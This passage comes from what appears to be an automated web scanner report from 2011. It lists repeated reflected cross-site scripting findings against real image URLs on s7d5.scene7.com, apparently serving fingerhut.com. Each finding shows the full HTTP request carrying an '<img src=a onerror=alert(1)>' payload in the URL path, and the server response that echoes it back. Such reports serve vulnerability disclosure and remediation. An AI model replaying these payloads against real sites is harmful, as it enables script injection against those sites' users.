Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:32 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/ND797_VA_9994cb2f<img src=a onerror=alert(1)>9829a3c9865

5.80. http://s7d5.scene7.com/is/image/bluestembrands/ND877_A_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/ND877_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 10ce7<img%20src%3da%20onerror%3dalert(1)>0733927d8c7 was submitted in the REST URL parameter 4. This input was echoed as 10ce7<img src=a onerror=alert(1)>0733927d8c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/ND877_A_99910ce7<img%20src%3da%20onerror%3dalert(1)>0733927d8c7?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Mon, 16 May 2011 01:38:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:45 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/ND877_A_99910ce7<img src=a onerror=alert(1)>0733927d8c7

5.81. http://s7d5.scene7.com/is/image/bluestembrands/NE440_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NE440_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 917c4<img%20src%3da%20onerror%3dalert(1)>5834b878d03 was submitted in the REST URL parameter 4. This input was echoed as 917c4<img src=a onerror=alert(1)>5834b878d03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE440_WM1_400917c4<img%20src%3da%20onerror%3dalert(1)>5834b878d03?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:26 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE440_WM1_400917c4<img src=a onerror=alert(1)>5834b878d03

5.82. http://s7d5.scene7.com/is/image/bluestembrands/NE682_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NE682_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 53aaa<img%20src%3da%20onerror%3dalert(1)>858eeabeb94 was submitted in the REST URL parameter 4. This input was echoed as 53aaa<img src=a onerror=alert(1)>858eeabeb94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE682_WVA_99953aaa<img%20src%3da%20onerror%3dalert(1)>858eeabeb94?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:38 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE682_WVA_99953aaa<img src=a onerror=alert(1)>858eeabeb94

5.83. http://s7d5.scene7.com/is/image/bluestembrands/NE967_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NE967_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6168f<img%20src%3da%20onerror%3dalert(1)>e1501599207 was submitted in the REST URL parameter 4. This input was echoed as 6168f<img src=a onerror=alert(1)>e1501599207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NE967_WM1_4006168f<img%20src%3da%20onerror%3dalert(1)>e1501599207?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:36:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:12 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NE967_WM1_4006168f<img src=a onerror=alert(1)>e1501599207

5.84. http://s7d5.scene7.com/is/image/bluestembrands/NH642_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NH642_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4083<img%20src%3da%20onerror%3dalert(1)>f0bf3cf58c5 was submitted in the REST URL parameter 4. This input was echoed as f4083<img src=a onerror=alert(1)>f0bf3cf58c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NH642_VA_999f4083<img%20src%3da%20onerror%3dalert(1)>f0bf3cf58c5?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:43 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NH642_VA_999f4083<img src=a onerror=alert(1)>f0bf3cf58c5

5.85. http://s7d5.scene7.com/is/image/bluestembrands/NI736_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NI736_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d75c6<img%20src%3da%20onerror%3dalert(1)>7c7ffbc116d was submitted in the REST URL parameter 4. This input was echoed as d75c6<img src=a onerror=alert(1)>7c7ffbc116d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NI736_WVA_999d75c6<img%20src%3da%20onerror%3dalert(1)>7c7ffbc116d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NI736_WVA_999d75c6<img src=a onerror=alert(1)>7c7ffbc116d

5.86. http://s7d5.scene7.com/is/image/bluestembrands/NJ310_WM1_400 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NJ310_WM1_400

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 85774<img%20src%3da%20onerror%3dalert(1)>9ee1255cff was submitted in the REST URL parameter 4. This input was echoed as 85774<img src=a onerror=alert(1)>9ee1255cff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ310_WM1_40085774<img%20src%3da%20onerror%3dalert(1)>9ee1255cff?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:36:37 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ310_WM1_40085774<img src=a onerror=alert(1)>9ee1255cff

5.87. http://s7d5.scene7.com/is/image/bluestembrands/NJ484_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NJ484_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 60ea5<img%20src%3da%20onerror%3dalert(1)>aa190ebc46 was submitted in the REST URL parameter 4. This input was echoed as 60ea5<img src=a onerror=alert(1)>aa190ebc46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ484_WVA_99960ea5<img%20src%3da%20onerror%3dalert(1)>aa190ebc46?$ShoppingCart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:17 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ484_WVA_99960ea5<img src=a onerror=alert(1)>aa190ebc46

5.88. http://s7d5.scene7.com/is/image/bluestembrands/NJ847_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NJ847_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ccb1<img%20src%3da%20onerror%3dalert(1)>30e1f908c3d was submitted in the REST URL parameter 4. This input was echoed as 4ccb1<img src=a onerror=alert(1)>30e1f908c3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NJ847_VA_9994ccb1<img%20src%3da%20onerror%3dalert(1)>30e1f908c3d?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:20 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NJ847_VA_9994ccb1<img src=a onerror=alert(1)>30e1f908c3d

5.89. http://s7d5.scene7.com/is/image/bluestembrands/NK248_VC_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NK248_VC_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f29e6<img%20src%3da%20onerror%3dalert(1)>b9664e76175 was submitted in the REST URL parameter 4. This input was echoed as f29e6<img src=a onerror=alert(1)>b9664e76175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NK248_VC_999f29e6<img%20src%3da%20onerror%3dalert(1)>b9664e76175?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:08 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NK248_VC_999f29e6<img src=a onerror=alert(1)>b9664e76175

5.90. http://s7d5.scene7.com/is/image/bluestembrands/NL522_A_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NL522_A_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee9d8<img%20src%3da%20onerror%3dalert(1)>2d4c68c6ee6 was submitted in the REST URL parameter 4. This input was echoed as ee9d8<img src=a onerror=alert(1)>2d4c68c6ee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NL522_A_999ee9d8<img%20src%3da%20onerror%3dalert(1)>2d4c68c6ee6?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Expires: Mon, 16 May 2011 01:38:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:13 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NL522_A_999ee9d8<img src=a onerror=alert(1)>2d4c68c6ee6

5.91. http://s7d5.scene7.com/is/image/bluestembrands/NL578_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NL578_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b08db<img%20src%3da%20onerror%3dalert(1)>baab8c8b42e was submitted in the REST URL parameter 4. This input was echoed as b08db<img src=a onerror=alert(1)>baab8c8b42e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NL578_WVA_999b08db<img%20src%3da%20onerror%3dalert(1)>baab8c8b42e?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NL578_WVA_999b08db<img src=a onerror=alert(1)>baab8c8b42e

5.92. http://s7d5.scene7.com/is/image/bluestembrands/NM486_VC_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NM486_VC_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 39b37<img%20src%3da%20onerror%3dalert(1)>cca42c92227 was submitted in the REST URL parameter 4. This input was echoed as 39b37<img src=a onerror=alert(1)>cca42c92227 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NM486_VC_99939b37<img%20src%3da%20onerror%3dalert(1)>cca42c92227?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:37:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:28 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NM486_VC_99939b37<img src=a onerror=alert(1)>cca42c92227

5.93. http://s7d5.scene7.com/is/image/bluestembrands/NQ086_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NQ086_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9f357<img%20src%3da%20onerror%3dalert(1)>6e2d4b0cae9 was submitted in the REST URL parameter 4. This input was echoed as 9f357<img src=a onerror=alert(1)>6e2d4b0cae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ086_VA_9999f357<img%20src%3da%20onerror%3dalert(1)>6e2d4b0cae9?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:12 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ086_VA_9999f357<img src=a onerror=alert(1)>6e2d4b0cae9

5.94. http://s7d5.scene7.com/is/image/bluestembrands/NQ087_VA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NQ087_VA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34855<img%20src%3da%20onerror%3dalert(1)>8daf28cab41 was submitted in the REST URL parameter 4. This input was echoed as 34855<img src=a onerror=alert(1)>8daf28cab41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ087_VA_99934855<img%20src%3da%20onerror%3dalert(1)>8daf28cab41?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 87
Expires: Mon, 16 May 2011 01:38:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:38:42 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ087_VA_99934855<img src=a onerror=alert(1)>8daf28cab41

5.95. http://s7d5.scene7.com/is/image/bluestembrands/NQ582_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NQ582_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f217f<img%20src%3da%20onerror%3dalert(1)>6b640d4054c was submitted in the REST URL parameter 4. This input was echoed as f217f<img src=a onerror=alert(1)>6b640d4054c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NQ582_WVA_999f217f<img%20src%3da%20onerror%3dalert(1)>6b640d4054c?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:27 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NQ582_WVA_999f217f<img src=a onerror=alert(1)>6b640d4054c

5.96. http://s7d5.scene7.com/is/image/bluestembrands/NR042_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NR042_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3d2ca<img%20src%3da%20onerror%3dalert(1)>8ae80290fc0 was submitted in the REST URL parameter 4. This input was echoed as 3d2ca<img src=a onerror=alert(1)>8ae80290fc0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NR042_WVA_9993d2ca<img%20src%3da%20onerror%3dalert(1)>8ae80290fc0?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:25 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NR042_WVA_9993d2ca<img src=a onerror=alert(1)>8ae80290fc0

5.97. http://s7d5.scene7.com/is/image/bluestembrands/NR149_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NR149_WVA_999

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c31b5<img%20src%3da%20onerror%3dalert(1)>f3ed8f7c5aa was submitted in the REST URL parameter 4. This input was echoed as c31b5<img src=a onerror=alert(1)>f3ed8f7c5aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/bluestembrands/NR149_WVA_999c31b5<img%20src%3da%20onerror%3dalert(1)>f3ed8f7c5aa?$Shoppingcart$ HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 88
Expires: Mon, 16 May 2011 01:37:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 01:37:50 GMT
Connection: close
X-N: S

Unable to find /bluestembrands/NR149_WVA_999c31b5<img src=a onerror=alert(1)>f3ed8f7c5aa

5.98. http://s7d5.scene7.com/is/image/bluestembrands/NS372_WVA_999 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NS372_WVA_999

Issue detail

